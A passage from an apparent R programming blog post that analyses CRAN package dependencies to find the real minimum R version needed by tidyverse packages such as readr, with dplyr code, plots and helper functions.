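real_min = as.character(max(numeric_version(r_min[needed])))
real_min
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here &lt;code&gt;pkgA&lt;/code&gt; declares R 3.1.0, but one of its imports needs 3.3.0, so that is the version a user actually needs.&lt;/p&gt;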
&lt;h3 id="some-interesting-things"&gt;Some interesting things&lt;/h3&gt;
&lt;p&gt;Before we work out the maximum R version for each set of imports, we should first investigate how many imports each package has, using a bit of {dplyr}&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;imp &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(package, depend_type) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(depend_package)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(package, n) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(depend_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Enhances&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; depend_type &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;LinkingTo&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;imp &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(depend_type) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;summarise&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mean&lt;/span&gt;(n))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 3 x 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## depend_type `mean(n)`&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 Depends 1.96&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 Imports 4.98&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 Suggests 3.63&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Using histograms we get a better idea of the overall numbers. Note that here we’re using the ipsum theme from the {hrbrthemes} package.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(hrbrthemes)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(imp, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(n)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_histogram&lt;/span&gt;(binwidth &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, colour&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;white&amp;#34;&lt;/span&gt;, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;steelblue&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;facet_wrap&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;depend_type) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlim&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;25&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylim&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;6000&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_ipsum&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;No. of packages&amp;#34;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Frequency&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Package dependencies&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;An average of 5 imports per package&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; caption&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="featured.jpg" style="width:650px; class:image-center"&gt;
&lt;h2 id="maximum-overall-imports"&gt;Maximum overall imports&lt;/h2&gt;
&lt;p&gt;As I’ve mentioned, we need to obtain not just the imported packages, but also their dependencies. Fortunately, the {tools} package comes to our rescue:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tools&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;package_dependencies&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;readr&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; which &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Depends&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Imports&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;LinkingTo&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unlist&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unname&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Rcpp&amp;#34; &amp;#34;tibble&amp;#34; &amp;#34;hms&amp;#34; &amp;#34;R6&amp;#34; &amp;#34;BH&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [6] &amp;#34;methods&amp;#34; &amp;#34;pkgconfig&amp;#34; &amp;#34;rlang&amp;#34; &amp;#34;utils&amp;#34; &amp;#34;cli&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [11] &amp;#34;crayon&amp;#34; &amp;#34;pillar&amp;#34; &amp;#34;assertthat&amp;#34; &amp;#34;grDevices&amp;#34; &amp;#34;fansi&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [16] &amp;#34;utf8&amp;#34; &amp;#34;tools&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Using the &lt;code&gt;package_dependencies()&lt;/code&gt; function, we simply&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Obtain a list of dependencies for a given package&lt;/li&gt;
&lt;li&gt;Extract the maximum version of R for all packages in the list&lt;/li&gt;
&lt;/ul&gt;
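&lt;p&gt;The two steps above can be sketched in base R on a toy dependency table. This is only an illustration: the package names, the &lt;code&gt;direct_deps&lt;/code&gt; and &lt;code&gt;r_required&lt;/code&gt; objects and both functions are made up for the example, and the hand-rolled traversal stands in for &lt;code&gt;package_dependencies(recursive = TRUE)&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Toy data, invented for illustration (not real CRAN metadata)
direct_deps = list(
  pkgA = c(&amp;#34;pkgB&amp;#34;, &amp;#34;pkgC&amp;#34;),
  pkgB = &amp;#34;pkgD&amp;#34;,
  pkgC = character(0),
  pkgD = character(0)
)
r_required = c(pkgA = &amp;#34;3.0.2&amp;#34;, pkgB = &amp;#34;3.1.0&amp;#34;, pkgC = NA, pkgD = &amp;#34;3.0.0&amp;#34;)

# Step 1: collect all direct and indirect dependencies of a package
all_deps = function(pkg, deps) {
  found = character(0)
  todo = deps[[pkg]]
  while (length(todo) &amp;gt; 0) {
    current = todo[1]
    todo = todo[-1]
    if (!(current %in% found)) {
      found = c(found, current)
      todo = c(todo, deps[[current]])
    }
  }
  found
}

# Step 2: maximum stated R version over the package and its dependencies
real_r_version = function(pkg, deps, r_required) {
  vers = unname(r_required[c(pkg, all_deps(pkg, deps))])
  vers = vers[!is.na(vers)]
  as.character(max(numeric_version(vers)))
}

real_r_version(&amp;#34;pkgA&amp;#34;, direct_deps, r_required)
## [1] &amp;#34;3.1.0&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here the toy package &lt;code&gt;pkgA&lt;/code&gt; states R 3.0.2, but one of its dependencies states R 3.1.0, so 3.1.0 is the version actually needed.&lt;/p&gt;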
&lt;p&gt;At the end of this post, there are two helper functions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;max_r_version()&lt;/code&gt; - takes a vector of R versions and returns the maximum version. E.g.
&lt;pre tabindex="0"&gt;&lt;code&gt;max_r_version(c(&amp;#34;3.2.0&amp;#34;, &amp;#34;3.3.2&amp;#34;, &amp;#34;3.2.0&amp;#34;))
## 3.3.2
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_r_ver()&lt;/code&gt; - calls &lt;code&gt;package_dependencies()&lt;/code&gt; and returns the maximum R version out of all of the dependencies.&lt;/li&gt;
&lt;/ul&gt;
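&lt;p&gt;The &lt;code&gt;max_r_version()&lt;/code&gt; helper listed at the end of the post looks for major versions 3, 2 and 1 in turn. As an aside, base R can compare version strings directly through &lt;code&gt;numeric_version()&lt;/code&gt;, which works for any major version. A minimal sketch, where &lt;code&gt;max_r_version_base()&lt;/code&gt; is a hypothetical name and not the function used for the results in this post:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical alternative to max_r_version(), using only base R
max_r_version_base = function(r_versions) {
  # Packages with no stated R version are ignored
  r_versions = r_versions[!is.na(r_versions)]
  if (length(r_versions) == 0) return(NA_character_)
  # numeric_version objects compare component by component,
  # so 3.10.0 ranks above 3.9.0
  as.character(max(numeric_version(r_versions)))
}

max_r_version_base(c(&amp;#34;3.2.0&amp;#34;, &amp;#34;3.3.2&amp;#34;, &amp;#34;3.2.0&amp;#34;))
## [1] &amp;#34;3.3.2&amp;#34;
max_r_version_base(c(&amp;#34;3.9.0&amp;#34;, &amp;#34;3.10.0&amp;#34;, NA))
## [1] &amp;#34;3.10.0&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;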
&lt;p&gt;Also, we have simplified some of the details and what we&amp;rsquo;ve done isn&amp;rsquo;t quite right - it&amp;rsquo;s more of a first approximation. See the end of the post for details.&lt;/p&gt;
&lt;p&gt;Now that’s done, we can pass in the list of {tidyverse} packages and then compare their stated R version with the R version actually required:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Here we are using just the tidyverse&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# But this works with any packages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_dfr&lt;/span&gt;(tidy_pkgs, get_r_ver, av_pkgs) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(package) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;slice&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(package, r_real, r_cur)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then select the packages where there is a difference&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(r_real &lt;span style="color:#ff7b72;font-weight:bold"&gt;!=&lt;/span&gt; r_cur &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(r_real) &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;amp;&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;is.na&lt;/span&gt;(r_cur)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# A tibble: 3 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Groups: package [3]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package r_real r_cur
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;chr&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; readr &lt;span style="color:#a5d6ff"&gt;3.1.0&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3.0.2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; tidyr &lt;span style="color:#a5d6ff"&gt;3.1.2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3.1.0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The largest difference in R versions is for {readr} (which feeds into the {tidyverse}). {readr} claims to need only R version 3.0.2, but a bit more investigation shows that {readr} depends on the {tibble} package, which requires R version 3.1.0. &lt;strong&gt;Although&lt;/strong&gt;, it is worth noting that 3.1.0 is fairly old!&lt;/p&gt;
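&lt;p&gt;A note on the filter used above: comparing a version with a missing value gives &lt;code&gt;NA&lt;/code&gt;, and &lt;code&gt;filter()&lt;/code&gt; drops rows where the condition is &lt;code&gt;NA&lt;/code&gt;, which is why the extra &lt;code&gt;is.na()&lt;/code&gt; clause is there. A small base R illustration with made-up values:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Made-up versions; the second package states no R version at all
r_real = c(&amp;#34;3.1.0&amp;#34;, &amp;#34;3.1.0&amp;#34;, &amp;#34;3.2.0&amp;#34;)
r_cur = c(&amp;#34;3.0.2&amp;#34;, NA, &amp;#34;3.2.0&amp;#34;)

# A plain comparison is NA wherever r_cur is missing
plain = r_real != r_cur
plain
## [1]  TRUE    NA FALSE

# The extra clause turns that NA into TRUE, so the row is kept
with_na_clause = r_real != r_cur | (!is.na(r_real) &amp;amp; is.na(r_cur))
with_na_clause
## [1]  TRUE  TRUE FALSE
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;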
&lt;h2 id="take-away-lessons"&gt;Take away lessons&lt;/h2&gt;
&lt;p&gt;The takeaway message is that dependencies matter. A single change affects everything in the package dependency tree. The other lesson is that the tidyverse team have been very &lt;strong&gt;careful&lt;/strong&gt; about their dependencies. In fact, all of their packages are checked on R 3.1, 3.2, &amp;hellip;, devel.&lt;/p&gt;
&lt;h2 id="simplifications-skipping-package-versions"&gt;Simplifications: skipping package versions&lt;/h2&gt;
&lt;p&gt;In this analysis, we&amp;rsquo;ve completely ignored package version numbers and always assumed we need the latest version of a package. This clearly isn&amp;rsquo;t correct. So to do this analysis properly, we would need the historical DESCRIPTION files for packages and use those to determine versions.&lt;/p&gt;
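&lt;p&gt;To give a flavour of what that fuller analysis might involve, here is a rough sketch that picks the oldest release satisfying a version constraint and reads off its R requirement. The release history is invented for illustration, as are the &lt;code&gt;releases&lt;/code&gt; data frame and the &lt;code&gt;oldest_ok()&lt;/code&gt; function; real values would have to come from the historical DESCRIPTION files.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;# Invented release history for one dependency (not real CRAN data)
releases = data.frame(
  version = c(&amp;#34;1.0.0&amp;#34;, &amp;#34;1.3.1&amp;#34;, &amp;#34;1.4.2&amp;#34;),
  r_required = c(&amp;#34;3.0.0&amp;#34;, &amp;#34;3.1.0&amp;#34;, &amp;#34;3.1.0&amp;#34;),
  stringsAsFactors = FALSE
)

# Oldest release that satisfies a constraint of the form (&amp;gt;= min_version)
oldest_ok = function(releases, min_version) {
  v = numeric_version(releases$version)
  ok = v &amp;gt;= numeric_version(min_version)
  oldest = min(v[ok])
  releases[v == oldest, ]
}

oldest_ok(releases, &amp;#34;1.3.1&amp;#34;)$r_required
## [1] &amp;#34;3.1.0&amp;#34;
oldest_ok(releases, &amp;#34;1.0.0&amp;#34;)$r_required
## [1] &amp;#34;3.0.0&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In this toy case, a looser constraint on the dependency would lower the R version actually required, which is exactly the detail that assuming the latest release glosses over.&lt;/p&gt;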
&lt;p&gt;Thanks to Jim Hester who spotted an error in a previous version of this post.&lt;/p&gt;
&lt;hr&gt;
&lt;h3 id="functions"&gt;Functions&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;clean_dependencies &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(av_pkgs, type) {
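&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;## Split the comma-separated dependency field into one row per dependency&lt;/span&gt;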
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; no_of_cols &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_count&lt;/span&gt;(av_pkgs[[type]], &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;), na.rm &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cols &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(type, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq_len&lt;/span&gt;(no_of_cols))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; av_clean &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; av_pkgs &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;separate&lt;/span&gt;(type, sep &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;,&amp;#34;&lt;/span&gt;, into &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cols, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;right&amp;#34;&lt;/span&gt;, remove &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(key &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; type, pkg, cols) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;(pkg) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;!!&lt;/span&gt;type) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
